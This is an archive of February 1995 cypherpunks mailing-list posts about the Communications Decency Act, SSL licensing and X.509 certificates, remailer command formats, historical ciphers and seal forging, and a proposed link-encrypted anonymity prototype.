> > indecent so could at most be relegated to late night hours (and they've
> > struck down laws banning indecency 24 hours... I think some stations are
> > suing with the claim that such relegation constitutes censorship).
> > 
> > Don't remember their exact formulation, which isn't very exact anyway.
> > 
> 
> The question is: What is obsene? What the community in NYC considers 
> obsene is sure a lot different than what the community in Elk River 
> Minnesota considers obsene. (They've been trying to eject their one XXX 
> bookstore for years now while NYC has the American Museum of Pornography 
> at 42nd Street ;) ;) :) ) As you can see, obsenity depends where you are 
> geographically located, at least according to our highest court. If 
> community standards say it is obsene then it is. They never legally 
> defined what constitutes something as being obsene or an obsenity.

The definition is not entirely up to "community standards". I think the
court definied it loosely as 'material regarding sexual and excretory
functions' which appeals to "prurient interests".

Anyhw, they have enough of a national "standard" for the FCC to crack
down on broadcasters who breach the rules.

Of course geographic community standards are problematic too with
telecommunications since postal inspectors from Tennessee can call
up adult bulletin boards in California...

> 
> Sam
> 

Rob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 8 Feb 95 12:25:23 PST
To: jpp@markv.com
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <9502072138.aa29510@hermix.markv.com>
Message-ID: <Pine.3.89.9502081213.A7848-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Feb 1995 jpp@markv.com wrote:
 
> Uh oh!  Egg on my face.  Will someone explain to me how the amendments
> in S.314 make owners of ISPs or other computer systems liable for
> 'bad' data?  I apologize for my previous uncalled for (so it seams to
> me now) ranting.


 (A) by striking out `telephone' in the matter above
        subparagraph (A) and inserting `telecommunications device'; 
 (B) by striking out `makes any comment, request,
        suggestion, or proposal' in subparagraph (A) and inserting
        `makes, transmits, or otherwise makes available any comment, request,
                ^^^^^^^^^^
         suggestion, proposal, image, or other communication'; 

This appears to make ISP's responsible for content.

It makes them responsible for something that they cannot 
control without violating people privacy.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 8 Feb 95 12:25:47 PST
To: cypherpunks@toad.com
Subject: Re: skronk
In-Reply-To: <199502081852.KAA01719@gwarn.versant.com>
Message-ID: <199502082025.MAA00565@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


>THUS SPAKE "Kipp E.B. Hickman" <kipp@warp.mcom.com>:
># It does what you are trying to accomplish (I think), and it is already deployed
># in production code (the Netscape client and server products). In addition, we
># announced this week a free (for non-commerical use) reference implementation.
># The code will be out on the net as soon as the lawyers are happy :-)

When we last left this story, only certificates from a few (one?)
signatory authorities were going to be accepted by Netscape clients.
Would this mean that competitors offering Netscape servers would have to
go to Netscape to get their keys signed in order to interoperate with
existing Netscape clients?  I think this is too limiting.

People should be able to choose their own key signers.  This should be a
configuration option.  It should not be compiled into the client!  That
hurts your own flexibility as well as interfering with interoperatbiliy.

Can I use this reference implementation and set up a SSL-compatible
service today, or do I have to go to you and/or everyone's friends at RSA
and get a signature first?  As long as it is the latter I think that SSL
is not going to be able to be a well-established standard.  People are
going to resent having to register with the authorities in order to set
up a secure web page.

Hal Finney
hfinney@shell.portal.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 8 Feb 95 12:38:30 PST
To: cypherpunks@toad.com
Subject: Re: MIME based remailing commands
In-Reply-To: <23676.792177411.1@nsb.fv.com>
Message-ID: <199502082037.MAA02640@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Nathaniel Borenstein <nsb@nsb.fv.com> writes:

>Excerpts from junk.interesting: 7-Feb-95 Re: MIME based remailing co..
>"Perry E. Metzger"@imsi. (2553)

>> > > It is being remailed via a MIME-based structure where two new content types
>> > > are defined: multipart/remail and application/remail-commands.  The
>> > > multipart/remail type is supposed to be composed of two parts, the
>> > > application/remail-commands part which has remailer commands, and the
>> > > other part which is the "payload" to be remailed.

>Perhaps you might consider writing up an informational RFC to define
>these types?  I think that would be very useful. -- Nathaniel

Well, that was just an example; I was making those names up off the top
of my head in order to concretize what I understood Perry was suggesting.

I can see that putting remailer commands into a specific part of a MIME
multipart message has some advantages.  Right now we are basically
having the remailing commands be mail header fields.  But really people
aren't supposed to just make up new fields like that.  I think the
"name space" of these fields is protected somewhat more than many other
aspects of communication protocols on the net.  Is there precedent for
adding service-by-mail functionality in this way?  I am not completely
comfortable with it.  And as we think of new functionality and new
commands they all have to get added at this top level, the same
visibility and name space as "Subject", "From", and "To".

OTOH it does have the advantage that it is easy to do, at least with the
"::" pasting token idea (which perhaps would need to be documented in its
own right).

If we did use a separate message part we'd have our own little name space
to use, with no fears of conflicting with someone else.  (Maybe "Latency"
might be used in a future extension of RFC822 for some other meaning than
what we are using it for.)  I am not sure what has to be done to get an
RFC approved but I suspect that adding mail header fields would be much
more likely to hit opposition than adding yet another MIME type.

What does Mixmaster use for its commands?  Does it use "::" followed by
Anon-Send-To: and such?  Or some other format?  Maybe it should be made
MIME compliant from the beginning.  This way we are moving with the
current, the flow of the net, rather than across it.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Craig A. Johnston" <caj@tower.techwood.org>
Date: Wed, 8 Feb 95 12:44:14 PST
To: cypherpunks@toad.com (cypherpunks mailing list)
Subject: Judges-L FAQ
Message-ID: <199502082043.MAA21652@tower.techwood.org>
MIME-Version: 1.0
Content-Type: text



It has come to my attention that the Judges-L FAQ is being distributed
by someone who obtained it on this list, and being sent to people made
to look as if it has issued from David Stodolsky.  

I must inform you that this FAQ is copyrighted material, and 
you are requested not to distribute it. 


-Craig




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 8 Feb 95 12:46:20 PST
To: cypherpunks@toad.com
Subject: Re: Selection key crypto protocol trial balloon
In-Reply-To: <J84c2c4w165w@dxm.ernet.in>
Message-ID: <199502082045.MAA03683@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


rishab@dxm.ernet.in (Rishab Aiyer Ghosh) writes:

>wcs@anchor.ho.att.com writes:

>> I'm not sure I really believe it's workable, but what it does
>> sound a bit like is CDMA spread-spectrum, which lets a bunch of

>Um no. The main thing is that what is extracted with the selection key is
>_different_ from what was put in...

Let me get straight where we are.  Rishab's concrete proposal was not an
implementation, but rather a set of requirements.  There was no
suggestion about any specific algorithms that would meet those
requirements, right?  The question is whether any such algorithm could
exist.

It is hard for me to see how this could possibly work.  The message
receiver sends this "selection key" to the intermediary, and that somehow
pulls out the saved message, but in a form such that the intermediary
doesn't recognize it.  And the intermediary himself can't tell exactly
which message is produced.  But it is nevertheless exactly the message
which was meant for this particular receiver.

The thing is, the receiver does not have much more information than the
intermediary.  At best he knows a secret key which may help decrypt the
message in some way.  But I don't see how that can be used to pull out
the message data since it can't be revealed to the intermediary.

I can't really prove that this is impossible, but it certainly looks that
way.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kipp E.B. Hickman" <kipp@warp.mcom.com>
Date: Wed, 8 Feb 95 13:09:44 PST
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: skronk
In-Reply-To: <199502081954.OAA22660@bwface.bwh.harvard.edu>
Message-ID: <9502081309.ZM28575@warp.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 8,  2:54pm, Adam Shostack wrote:
> Subject: Re: skronk
> 	Will there be a commercially licensed version, so that things
> built on SSL can be used in freeware and payware?  (Like the recently
> announced commercial version of RSAREF)
>
> 	Actually, make that "When will there be.." since otherwise SSL
> will be yet another standard one company uses.  Such standards are
> less than useful.

Yes, there will be. We haven't formalized it yet, but we have been getting
enough interest to warrant it. Understand that this is not the main thrust of
our business (selling source code), so it will certainly take some time to put
it all together.


-- 
---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp@netscape.com          http://home.mcom.com/people/kipp/index.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 8 Feb 95 13:42:13 PST
To: kkirksey@world.std.com (Ken Kirksey)
Subject: Re: Four Horsemen
In-Reply-To: <199502082012.AA18319@world.std.com>
Message-ID: <199502082138.NAA17319@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Ken Kirksey wrote:

> Just a quick question:  someone asked me the other day what the "Four
> Horsemen of the Infocalypse" were, and I told him
> 
>   1) Drug Dealers
>   2) Terrorists
>   3) Pedophiles
>   4) Pornographers
> 
> Did I get it right, or did I have a synaptic misfire somewhere along
> the line?

I usually just lump pedophiles and child pornographers together and
don't separately mention "normal" pornographers, as there's not much
on-line that competes with "Hustler." (The AA case, though, makes
conventional pornography a Horseman.)

Usually I also cite "money launderers" as the Fourth Horseman. This
lumps in tax evaders, etc.

But, now that we know what the Four Horsemen are, what's in the Seven
Vials? And since the British spelling and pronunciation is "phial,"
which sounds like "file" (but which has a different root: vial vs.
filum), we could call these the "seven files."

(Not to be confused with the "seventh veil.")

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: EFN Autoresponder <usenet@news.efn.org>
Date: Wed, 8 Feb 95 13:42:02 PST
To: cypherpunks@toad.com
Subject: Re: lwall
Message-ID: <9502082141.AA28209@mars.efn.org.efn.org>
MIME-Version: 1.0
Content-Type: text/plain


DO NOT PANIC!  REMAIN CALM!  READ *ALL* OF THIS MESSAGE BEFORE GETTING UPSET!

Your Usenet test article was received here at the news gateway machine 
for Oregon Public Networking, located in Eugene, Oregon, USA.
The OPN newsadmins can be reached via e-mail at usenet@news.efn.org.  Please 
note that we do not offer news access to sites outside of our 
organization.

If you're a newsadmin and you'd like to run your own autoresponder, this one
is available from ftp://ftp.cccd.edu/pub/usenet/innautorespond.

Or you can just ask us to mail you a copy.

If you want to suppress this message in the future, include the word "ignore" 
in the Subject: header of any subsequent articles posted to *.test.  You could
also post your test articles with a Distribution: header of "local" to prevent
them from leaving your local machine, or you could also ask your local 
newsadmin to create a local *.test group that will not propagate outside of 
your organization.

There are typically 5 possible reasons why you were sent this e-mail message:

1) You intentionally posted a Usenet news article to a *.test newsgroup.  
These newsgroups exist so you can verify that your articles are being 
propagated correctly.  When your article arrives here, we send you this message
as confirmation.  We will only send you ONE e-mail reply for each of your test
articles that we see.

2) You unintentionally posted a Usenet news article to a *.test newsgroup.  
This is a bit of net.childishness caused by a Followup-To: header directing all
replies into a *.test newsgroup.  This is done by somebody upset with the
content of a discussion thread who wants to "punish" anybody who replies to his
message.  Your reply will be sent to *.test instead of the original newsgroup,
and you will start receiving autoresponder messages similar to this one that
you didn't ask for.  To avoid this in the future, look for a Followup-To:
header and make sure it's appropriate before replying to any articles.

3) You were a victim of a Reply-To: header directing your e-mail into a *.test
newsgroup via a mail->news gateway.  Similar to 2) above.

4) Somebody has forged a posting in your name to one of the *.test newsgroups.
To avoid this in the future, use better net.etiquette and you will make fewer
net.enemies.  If you want to try and identify the forger, use the following
procedure.  Make a legitimate posting to the same *.test newsgroup that the
forger used.  We will send you an e-mail reply.  Compare the Path: header from
this legitimate reply with the Path: header from the forgery.  The front
part of the two headers will be the same or topologically similar path to
your site.  Where the forged header becomes substantially different can
provide clues to where the forger lives.  Note that if you receive multiple
newsfeeds you may need to repeat this process several times so you can discover
all legitimate paths between our site and yours.  Once you think you've
identified the forger's site, try sending POLITE e-mail to the newsadmin/
sysadmin/postmaster explaining the situation.

5) You issued a cancel control message to a *.test newsgroup.  Some users
dislike autoresponses for cancel messages, but the newsadmins here think it
can be a valuable diagnostic tool for verifying cancel propagation.  If you
don't like it, use the "delete" key in your mail client!

All headers plus at most 10 lines of user text from your original article are
reproduced below for your perusal:

Path: mars.efn.org!cs.uoregon.edu!news.uoregon.edu!vixen.cso.uiuc.edu!howland.reston.ans.net!agate!overload.lbl.gov!emf.emf.net!hilbert.dnai.com!nbn!miwok!news.zeitgeist.net!ack.berkeley.edu!not-for-mail
Subject: lwall
Message-ID: <PINE4545-dhfsdkjc@ack.berkeley.edu>
NNTP-Posting-Host: ack.berkeley.edu
Organization: cypherpunks
Lines: 2
From: cypherpunks@toad.com
Distribution: world
Newsgroups: alt.test
Date: 6 Feb 1995 19:34:19 GMT

test
test




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Wed, 8 Feb 95 13:44:12 PST
To: "Craig A. Johnston" <caj@tower.techwood.org>
Subject: Re: Judges-L FAQ
In-Reply-To: <199502082043.MAA21652@tower.techwood.org>
Message-ID: <199502082143.NAA20893@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> "Craig A. Johnston" <caj@tower.techwood.org> writes:
> 
> It has come to my attention that the Judges-L FAQ is being distributed
> by someone who obtained it on this list, and being sent to people made
> to look as if it has issued from David Stodolsky.  

> I must inform you that this FAQ is copyrighted material, and 
> you are requested not to distribute it. 

A version of this FAQ with Message-ID <01050105.hhv9l1@arch.ping.dk> was
posted from Stodolsky's machine in Denmark on 17 Dec 94 by
judges@arch.ping.dk to news.admin.* and misc.legal, asking for feedback
and asking for no distribution restrictions.  IANAL, but it looks to me
like your genie's out of the bottle.

	Jim Gillogly
	Highday, 18 Solmath S.R. 1995, 21:35




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Craig A. Johnston" <caj@tower.techwood.org>
Date: Wed, 8 Feb 95 13:59:01 PST
To: cypherpunks@toad.com (cypherpunks mailing list)
Subject: To clear this up.
Message-ID: <199502082158.NAA00214@tower.techwood.org>
MIME-Version: 1.0
Content-Type: text



Something needs clearing up:

I am not a Judges-L sympathizer.  The previous message was posted
at the request of David Stodolsky.  I am subscribed to the list to
see what is going on.  I find the idea of the Judges-L to be repulsive,
personally, as I have told DS and others.

I saw no harm in relaying this message to the list.  All it is likely
to do is create more anti-Judges-L sentiment.  David Stodolsky
claims that they have no desire to hide their FAQ, but that he wishes
for it to be distributed in a controlled fashion.  

To engage in what I deem "fair use": "...disclosure in the wrong context,
or at the wrong time can cause trouble..."

A beaut.

In sum, I find Judges-L repulsive and plan to keep an eye on it.

-Craig Johnston




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Wed, 8 Feb 95 14:11:03 PST
To: "Craig A. Johnston" <cypherpunks@toad.com (cypherpunks mailing list)
Subject: Re: Judges-L FAQ
Message-ID: <v03001409ab5ef19cb7c7@[140.174.229.204]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:43 2/8/95, Craig A. Johnston wrote:

>I must inform you that this FAQ is copyrighted material, and
>you are requested not to distribute it.

What good is a FAQ if you can't distribute it.  The judges are confused in
more ways than one.

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
      You couldn't get a clue during the clue mating season in         |
 a field full of horny clues if you smeared your body with clue musk   |
           and did the clue mating dance. - Edward Flaherty            |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Wed, 8 Feb 95 14:11:36 PST
To: kkirksey@world.std.com (Ken Kirksey)
Subject: Re: Jefferson Wheel Cypher
In-Reply-To: <199502082012.AA18336@world.std.com>
Message-ID: <199502082211.OAA21023@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain


Isn't that the same as Bazeries' Cylinder Cipher, where you have a bunch of
disks with mixed alphabets around the edges, you put them on a rod in some
order, set the plaintext along a row, then read the ciphertext off any
other row?  If so, a short paper of mine was just printed in "The
Cryptogram" (JF95 issue) about cryptanalyzing it.  A US military field
cipher was based on the Jefferson version; I handled a copy (with metal
disks) in the National Cryptologic Museum just outside Ft. Meade last
summer.  There may even be an Aegean Park Press publication on it.  The
servicemen hated it -- fiddling with all the disks in the heat of battle
made it cumbersome for tactical use.

If it's as I describe, I'd call it a multiple-key polyalphabetic: keyed
alphabets, keyed order, and (potentially ambiguous) offset key for
deciding how far around the cylinder to go.  The period is how many disks
you have, since they stay in the same order (but with different relative
offset) for the whole message.  It's not really an autokey under the
Meaning of the Act, since there's no feed-forward from one letter to the next.

I'm sure Kahn's "The Codebreakers" will have more info.

	Jim Gillogly
	Highday, 18 Solmath S.R. 1995, 21:59




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@wookie.net>
Date: Wed, 8 Feb 95 11:25:17 PST
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <9502072138.aa29510@hermix.markv.com>
Message-ID: <Pine.LNX.3.91.950208142556.7197B-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Feb 1995 jpp@markv.com wrote:

> Uh oh!  Egg on my face.  Will someone explain to me how the amendments
> in S.314 make owners of ISPs or other computer systems liable for
> 'bad' data?  I apologize for my previous uncalled for (so it seams to
> me now) ranting.

Sure, read on:

>    (a) Prohibited acts generally
>    
>    Whoever -
>    
>    (1) in the District of Columbia or in interstate or foreign
>    communication by means of [telephone] telecommunications
>    device -
>    
>    (A) [makes any comment, request, suggestion or proposal] 
>    makes, transmits, or otherwise makes available any comment,
>    request, suggestions, proposal, image, or other communication]
>    which is obscene, lewd, lascivious, filthy, or indecent;

Here's an important bit. "Transmits or otherwise makes available" is 
different from the earlier law. It DOES pleace a burden of responsibility 
upon the provider of service. NOTE that unlike other portions of the law, 
boths old and new versions, this part DOES NOT include the word 
"knowingly". Crucial, crucial point.

>    (B) [makes a telephone call, whether or not conversation
>    ensues, without disclosing his identity and with intent to
>    annoy, abuse, threaten, or harass any person at the called
>    number] makes a telephone call or utilizes a telecommunications
>    device, whether or not conversation or communications ensues,
>    without disclosing his identity with intent to annoy, abuse,
>    threaten, or harass any person at the called number or who
>    receives the communication;

No anonymous annoying! Does this mean we can't raid IRC channels anymore? 
Or flame people from anon.petit.fi (sp?) accounts?



- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@wookie.net>
Date: Wed, 8 Feb 95 11:28:49 PST
Subject: Re: Full text of S. 314
In-Reply-To: <Pine.SV4.3.91.950208022428.26104C@mirage.skypoint.com>
Message-ID: <Pine.LNX.3.91.950208142947.7197C-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Feb 1995, Samuel Kaplin wrote:

> I would suggest that everyone forward this to their ISP. It has a direct 
> bearing on them and most won't be aware of it.

This is exactly what I did here in NYC.


- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Wed, 8 Feb 95 14:44:03 PST
To: eric@remailer.net (Eric Hughes)
Subject: RE: a new way to do anonymity
Message-ID: <199502082243.AA19005@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> I'd suggest just getting something running first, to get some
> prototyping experience.

Now that I've just spent some time compiling and playing with Matt's ESM
program, it seems almost perfectly suited for prototyping Pipe-Net 
since you can use it to do nested encryption.  All that's needed is 
to hack it so that it implements link encryption (i.e., send a
constant stream of random data in between keypresses).

This is what the user would do: (LESM for Link Encrypted Session Manager)
lesm -l
lesm -l
login to server 1
lesm -s
lesm -l (or better yet take over a free LESM session already running
		 between server 1 and server 2)
login to server 2
lesm -s
lesm -s

I wonder if Matt has the time and interest do this...  If not then I 
guess I can try, but I've never done real crypto programming before...

Wei Dai


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzlIdDl0sXKgdnV5AQFKuwQAqhJulKWcPV8GWUM11+2zonT+EQ8q18YV
TAymUlhjuYo0csHP/nmoMDRpf/9veISdBQE/GlRkc1k0JsWpPBD0+6e0nA7kCTMO
xqVoXdM3F/qN31CXjMT9rgAanIXFat2Ox3bjT3g07ReaN372TPnGGvNauxO69Z52
kvWajSSXiSY=
=yF/i
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 8 Feb 95 11:48:24 PST
To: "Kipp E.B. Hickman" <kipp@warp.mcom.com>
Subject: Re: skronk
In-Reply-To: <9502081137.ZM28317@warp.mcom.com>
Message-ID: <9502081947.AA10312@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



I agree with much of what you say until you hit this:

"Kipp E.B. Hickman" says:
> You are right here. However, our observation is that an interesting chunk of
> the world is moving towards using X.509 based certificate infrastructures for
> many things.

Like who? Certainly not the internet standards people, no matter what
certain people might tell you. The X.509 body may still be twitching
but I don't think its heart is beating any longer.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 8 Feb 95 11:55:34 PST
To: kipp@warp.mcom.com (Kipp E.B. Hickman)
Subject: Re: skronk
In-Reply-To: <9502081137.ZM28317@warp.mcom.com>
Message-ID: <199502081954.OAA22660@bwface.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Will there be a commercially licensed version, so that things
built on SSL can be used in freeware and payware?  (Like the recently
announced commercial version of RSAREF)

	Actually, make that "When will there be.." since otherwise SSL
will be yet another standard one company uses.  Such standards are
less than useful.

Adam


Kipp wrote:

| > Please beat your lawyers to a pulp, until they make it useful for us.
| > If I can't create generally useful things with it, and share it with
| > thousands of others on the net for free, it's not going to be used by
| > the cypherpunk community.
| >
| > I recommend you put your reference implementation in the public domain
| > (except for the RSAREF component).  Or take Matt Blaze's crypto
| > offerings from AT&T as your model.
| 
| The implementation will be out very shortly (it's already done and working). It
| will be free for non-commerical usage, so hopefully most of the cypherpunks
| will be happy (if there is such a state of affairs mind you :^)
| 
| We won't be having any of the copy-leftish stuff that is in the
| RSAREF license - like not fiddling with the api, and having to give
| us back your hacks using it...Of course we want to hear about what
| people are doing with it (thats another purpose for the ssl-talk
| mailing list). 


-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Todd Masco)
Date: Wed, 8 Feb 95 12:09:54 PST
To: cypherpunks@toad.com
Subject: Re: skronk
In-Reply-To: <9502081137.ZM28317@warp.mcom.com>
Message-ID: <199502082006.PAA21801@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9502081137.ZM28317@warp.mcom.com>,
Kipp E.B. Hickman <kipp@warp.mcom.com> wrote:
>You are right here. However, our observation is that an interesting chunk of
>the world is moving towards using X.509 based certificate infrastructures for
>many things. 

AFAIK, the only interesting chunk is those corps that want some form of
"True Name" (and PKP/RSADSI, of course).

Everybody else hates them with a passion.  The Hastur crypto toolkit will
support them, but they'll be viewed as special cases of web-of-trust
signed keys with time-outs.
- --
Todd Masco     | "Change is not only necessary, it is inevitable."
cactus@hks.net |                          - Frank Zappa
     Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLzkkGCoZzwIn1bdtAQE6BAF+LLnnx8PG3kIHOmK7kcXoKEThYeXtZgG2
Ke9yqab4kXHMyMSlAPT94P1eicQvhWDJ
=BC1t
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kkirksey@world.std.com (Ken Kirksey)
Date: Wed, 8 Feb 95 12:12:35 PST
To: cypherpunks@toad.com
Subject: Four Horsemen
Message-ID: <199502082012.AA18319@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain


Message-Id: <v01510101ab5ecb0e67cd@DialupEudora>

-----BEGIN PGP SIGNED MESSAGE-----

Just a quick question:  someone asked me the other day what the "Four
Horsemen of the Infocalypse" were, and I told him

  1) Drug Dealers
  2) Terrorists
  3) Pedophiles
  4) Pornographers

Did I get it right, or did I have a synaptic misfire somewhere along
the line?

Ken

= Ken Kirksey            And the Clinton administration launched an attack on =
= kkirksey@world.std.com  people in Texas because those people were religious =
= Mac Guru & Developer    nuts with guns.  Hell, this country was founded by  =
=                         religious nuts with guns.           - P.J. O'Rourke =

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLzkbhOsZNYlu+zuBAQHVigQAzkp3fIlEfT82zSaRZPkIqkkaDJ5MNyRK
SOOq0QwAMB1/bGNGda0plC+aNGT1RnSpNJTS/8ISIJTDCwbmJGFYGxvRSgqyUkXO
dQrd6pLbYIxH1sTPIaAoM4BnmUhYzr5L4TauPgqTLYhqGKDa8RWbHggjLyTr/UfF
drRgBOM919Q=
=OcUi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kkirksey@world.std.com (Ken Kirksey)
Date: Wed, 8 Feb 95 12:12:36 PST
To: cypherpunks@toad.com
Subject: Jefferson Wheel Cypher
Message-ID: <199502082012.AA18336@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain


Message-Id: <v01510103ab5ed2c136c8@DialupEudora>

-----BEGIN PGP SIGNED MESSAGE-----

A couple of questions regarding Thomas Jefferson's Wheel Ciphyer:

1) How would you classify this cipher?  It looks to me like a polyalphabetic
   with the plaintext also being the key, kind of like an autokey.  Am 
   I correct, or is this cipher a different animal entirely?

2) Can anyone point me to references on the cryptanalysis of this cipher?
   
Many thanks in advance,

Ken

= Ken Kirksey            And the Clinton administration launched an attack on =
= kkirksey@world.std.com  people in Texas because those people were religious =
= Mac Guru & Developer    nuts with guns.  Hell, this country was founded by  =
=                         religious nuts with guns.           - P.J. O'Rourke =

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLzkjt+sZNYlu+zuBAQEwPgP/XMWm/qDr1A0D49iBJdYNOX18j3DNbBvG
xTOvSrzNziq9jq4026+TNpM3+PVGiji85yL3053jG26I0dJbckkVFr1PBfXmLrua
nHBt5t/qy7RSvjsW80ZreeqVKwulo3NtT+XuWjU7EXZDSPUZts4JuHnGdlqQRiMo
1ERDP4+StM0=
=PcEo
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kkirksey@world.std.com (Ken Kirksey)
Date: Wed, 8 Feb 95 12:12:41 PST
To: cypherpunks@toad.com
Subject: Re: Seals and Sealing Waxes
Message-ID: <199502082012.AA18329@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain


Message-Id: <v01510102ab5ecd95ffb0@DialupEudora>

-----BEGIN PGP SIGNED MESSAGE-----

> "All crypto is economics," and this is what made seals and sealing wax so
> useful for so long. Saying "seals were duplicatable from the start" does
> not mean this feat was easy, even if technically possible.
> 
> In fact, the fine details produced by a good seal are hard to exactly
> emulate with a copy. Even on a two-dimensional surface. And with the advent
> of three-dimensional surfaces, which sealing wax made possible, the fine
> detail of a good seal was in fact very hard to forge.

But not impossible.  According to Kahn, the Austrian Black Chamber was
quite adept at forging seals in the late 1600's / early 1700's.  They
were able to take sealed correspondence in at 7 a.m., unseal it, copy the
message, re-seal it, and have it back in the postal stream by early
afternoon.  There was only one recorded case of them re-sealing a message
with the wrong seal, and that was because the seals were so similar.

All this is from memory, since I don't have my copy of _The Codebreakers_
here at work, so I may be off in some details.

Ken

= Ken Kirksey            And the Clinton administration launched an attack on =
= kkirksey@world.std.com  people in Texas because those people were religious =
= Mac Guru & Developer    nuts with guns.  Hell, this country was founded by  =
=                         religious nuts with guns.           - P.J. O'Rourke =

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLzkeVusZNYlu+zuBAQG5HgP+LuE0aOG6UxgZp/IrZCm2y9ESi9AT13v+
ePMulQHUXUv8cc4m0RTjD35+cmKSKADrP6L1oC6BCia+5d3Rhidh2KcqaoQZQLvc
rSuXbPgUpM7VJBOELtxc68CLJTpyaHBHvORJ//xH+/kN/++2f110+hZMwvgynrRd
Pj54hvqthKA=
=Jhff
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 8 Feb 95 13:31:05 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Wiretaps & terrorism
Message-ID: <199502082130.QAA23309@bwface.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



	(Why the FBI doesn't really need wiretaps)
	(Part of a continuing series)

From todays (Feb 8) Boston Globe, page 3 
by Larry Neumeister, AP

	New York- the FBI was on the trail of three of the World Trade
Center bombers nearly four years before teh explosion that killed six
and injured 1,000, the government said yesterday.

	In evidence presented at the trial of Sheik Omar Abdel-Rahman
and 10 others, the FBI also said it had bugged the Sheik's phone a
week before the blast.

	The surprising testimony - a day ater a key defendant switched
sides - indicated that the government had more extensive knowledge of
the planning for the trade center bombing than it had acknowledged.
